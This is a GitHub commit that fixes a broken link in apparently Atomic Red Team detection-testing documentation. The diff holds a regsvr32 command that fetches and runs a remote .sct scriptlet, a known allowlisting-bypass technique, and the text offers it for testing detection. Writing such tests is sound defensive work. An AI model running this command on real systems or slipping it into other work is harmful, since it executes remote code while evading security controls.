Fix broken link (#1034)

Due to 5d7ea5c115

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Clément Notin
2020-06-20 01:16:37 +02:00
committed by GitHub
parent 3495fd33a8
commit 52daaeaa35
+1 -1
View File
@@ -44,7 +44,7 @@ The details of this test, [which are located here](https://github.com/redcanaryc
describe how you can test your detection by simply running the below command:
```
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/src/RegSvr32.sct scrobj.dll
```
## Collect Evidence